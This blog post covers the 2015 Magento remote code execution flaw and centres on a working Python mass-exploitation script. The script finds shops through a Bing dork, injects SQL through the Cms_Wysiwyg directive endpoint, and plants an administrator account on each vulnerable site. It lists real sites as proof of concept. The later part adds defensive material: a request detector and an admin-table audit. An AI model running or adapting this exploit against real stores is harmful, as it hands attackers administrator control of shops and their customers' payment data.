All Newbie, Semua Tentang Ilmu


Analyzing Magento Vulnerability

Remote Code Execution 0day

Hi Friends,

Many of you already know that people go after whatever bears fruit for them; likewise, carders try to exploit shopping carts to get into the transaction system and snatch people's money. Magento is a popular eCommerce CMS, and because so many shopping sites are built on it, it is a main target as well.

Here is a recent exploit (obviously not found by me, but the code is mine) that lets an attacker change a site's username and password remotely; the cause is a remote code execution vulnerability.

Exploit Code

```python
#!/usr/bin/python
'''
POC Sites:
www.anandindia.in
goyalglassware.com
ishopping.pk
value.pk


References:
http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/
'''
try:
    from urlparse import urlsplit
    import requests, base64, sys, re, os
except:
    exit("\n\n[-] Import Error !\n")

def Exploit(url):
    final_url = "http://" + url + "/admin/Cms_Wysiwyg/directive/index/"
    q = """
        SET @SALT = 'rp';
        SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
        SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
        INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
        INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
    """
    query = q.replace("\n", "").format(username="stoker", password="secret")
    pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
    r = requests.post(final_url,
                      data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                            "filter": base64.b64encode(pfilter),
                            "forwarded": 1})
    if r.ok:
        print "\n -- > [{0}/admin]  Credentials: ['stoker' : 'secret']".format(url)
    else:
        print " [-] {0} Not Vulnerable".format(url)

def main():
    # Change Dork in Bing URL if u need to modify it !
    # Google Will also Work Same, infact more better if you use
    # inurl:js/magentothem/
    # dork, but it'll ask you to enter captcha after multiple requests from the same ip
    # i'm too lazy to play with that, so i gone ahead with bing.
    # Bing's instreamUrl:Title:URL is not gonna work Here !
    response = requests.get('http://www.bing.com/search?q=Powered+by+Magento+site%3Apk')
    URLs = re.findall(r'href=[\'"]?([^\'" >]+)', response.content) # Old Friend :P
    URLS_LIST = [] # Container for Bitches !
    for url in URLs:
        baseUrl = urlsplit(url).netloc # meet your requirements ;)
        if len(baseUrl) != 0: # Cheaters Not Allowed !
            URLS_LIST.append(baseUrl) # Load Bitches
    for uri in set(URLS_LIST):
        Exploit(uri) # Bang Bang Bang

if __name__ == '__main__':
    os.system('cls')
    try:
        print '''\n
-------------------------------------------------
        Title:  Magento Auth Exploit !

        Author: Muhammad Adeel
        Mail:   Chaudhary1337@gmail.com
        Blog:   http://urdusecurity.blogspot.com
-------------------------------------------------\n\n
        '''
        main()
    except:
        exit("\nErrrrrrrrrrrrrrrrroooooooooooooooooooooorrrrrrrrrrrrrrrrrrrrrrrrrrr !!!")
```

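The request the script sends has a recognisable shape: a POST to the `Cms_Wysiwyg/directive/index/` endpoint whose base64 `filter` field, once decoded, closes the popularity clause with `)` and chains further SQL. The detector below is an added example of mine, not code from the post, and turns that shape into a check that can run over recorded POST bodies (for example from a WAF or application log). The sample requests are constructed, and the `/admin/` prefix is assumed to be the default admin path.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# Endpoint abused by the script on this page (assumes the default /admin/ path).
DIRECTIVE_PATH = "/admin/Cms_Wysiwyg/directive/index/"

# A genuine popularity filter carries a few numeric fields. The injection closes
# the grid's SQL with ')' and chains further statements after ';'.
SQL_TAIL = re.compile(r"\)\s*;\s*(SET|SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I)


def safe_b64decode(value):
    """Decode base64, tolerating stripped '=' padding; None if it is not base64."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def inspect_request(path, body):
    """Return a finding for one POST (path + urlencoded body), or None if benign."""
    if not path.startswith(DIRECTIVE_PATH):
        return None
    fields = parse_qs(body, keep_blank_values=True)
    decoded_filter = safe_b64decode(fields.get("filter", [""])[0])
    if decoded_filter is None:
        return None
    match = SQL_TAIL.search(decoded_filter)
    if match is None:
        return None
    directive = safe_b64decode(fields.get("___directive", [""])[0]) or ""
    return {
        "path": path,
        "directive": directive,
        "statement": match.group(1).upper(),
        "touches_admin_user": "admin_user" in decoded_filter.lower(),
    }


def scan_requests(requests_seen):
    """Run inspect_request over (path, body) pairs and collect the findings."""
    findings = []
    for path, body in requests_seen:
        finding = inspect_request(path, body)
        if finding is not None:
            findings.append(finding)
    return findings


def _encode_request(directive, popularity_filter):
    """Build a body the way a form-encoded POST with base64 fields would look.
    Helper for the constructed samples below, not part of the detector."""
    return urlencode({
        "___directive": base64.b64encode(directive.encode()).decode(),
        "filter": base64.b64encode(popularity_filter.encode()).decode(),
        "forwarded": 1,
    })


GRID_DIRECTIVE = "{{block type=Adminhtml/report_search_grid output=getCsvFile}}"

# Constructed samples (not real traffic): an ordinary CSV export, a request whose
# filter breaks out of the popularity clause, and an unrelated admin request.
SAMPLE_REQUESTS = [
    (DIRECTIVE_PATH, _encode_request(GRID_DIRECTIVE,
                                     "popularity[from]=0&popularity[to]=3")),
    (DIRECTIVE_PATH, _encode_request(GRID_DIRECTIVE,
                                     "popularity[from]=0&popularity[to]=3"
                                     "&popularity[field_expr]=0);SELECT 1 FROM admin_user")),
    ("/admin/dashboard/", "form_key=abc"),
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(finding)
```

Only the second sample is reported: the decoded filter contains `);SELECT`, and `touches_admin_user` is set because the chained statement names the admin table. Matching on the decoded filter rather than on the raw body is the point: the base64 wrapper hides the SQL from any naive keyword rule.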

And here are the results I got from running the script.

[Screenshot: magento-0day-exploit]


Bingoo !!


P.S.: No sites were harmed, and the affected ones have already been reported.
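A site owner wondering whether they were among the affected ones can start from the two tables the injected SQL writes to. The audit below is an added example of mine, not from the post: it flags `admin_user` rows that are not on a known-admin list or that carry the placeholder identity the script inserts, and lists `admin_role` user rows that no longer point at an existing user. The rows, the known-admin list and the clock are all constructed.

```python
from datetime import datetime, timedelta

# Placeholder identity the script on this page writes into admin_user.
EXPLOIT_MARKERS = {"firstname": "Firstname", "lastname": "Lastname",
                   "email": "email@example.com"}


def audit_admin_users(user_rows, known_usernames, now, window_days=30):
    """Flag admin_user rows that are not on the known list or carry the
    exploit's placeholder identity. Each finding is (username, [reasons]).
    Rows are dicts with username, firstname, lastname, email, created."""
    findings = []
    for row in user_rows:
        reasons = []
        if row["username"] not in known_usernames:
            reasons.append("not in the known admin list")
        if all(row[key] == value for key, value in EXPLOIT_MARKERS.items()):
            reasons.append("placeholder identity used by the public exploit script")
        # Recency is context, only reported on rows already flagged above.
        if reasons and now - row["created"] <= timedelta(days=window_days):
            reasons.append("created within the last %d days" % window_days)
        if reasons:
            findings.append((row["username"], reasons))
    return findings


def orphan_roles(role_rows, user_rows):
    """role_id of admin_role rows of type 'U' whose user_id has no admin_user
    row: a common leftover when a user row was removed by hand."""
    user_ids = {row["user_id"] for row in user_rows}
    return [row["role_id"] for row in role_rows
            if row["role_type"] == "U" and row["user_id"] not in user_ids]


# Constructed rows (not a real export): one legitimate owner account, one
# account in the shape the script creates, and a role row for a deleted user.
USERS = [
    {"user_id": 1, "username": "admin", "firstname": "Site", "lastname": "Owner",
     "email": "owner@shop.example", "created": datetime(2014, 1, 10)},
    {"user_id": 7, "username": "stoker", "firstname": "Firstname",
     "lastname": "Lastname", "email": "email@example.com",
     "created": datetime(2015, 4, 24)},
]
ROLES = [
    {"role_id": 1, "role_type": "G", "user_id": 0},
    {"role_id": 2, "role_type": "U", "user_id": 1},
    {"role_id": 9, "role_type": "U", "user_id": 7},
    {"role_id": 10, "role_type": "U", "user_id": 8},  # user 8 no longer exists
]
KNOWN_ADMINS = {"admin"}
NOW = datetime(2015, 4, 25)

if __name__ == "__main__":
    for username, reasons in audit_admin_users(USERS, KNOWN_ADMINS, NOW):
        print(username, "->", "; ".join(reasons))
    print("orphan role rows:", orphan_roles(ROLES, USERS))
```

Run against a real export, the known-admin list is the one to maintain in advance; the placeholder check only catches this particular script, since anyone can change the literal strings, so an unknown username is the finding that matters.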




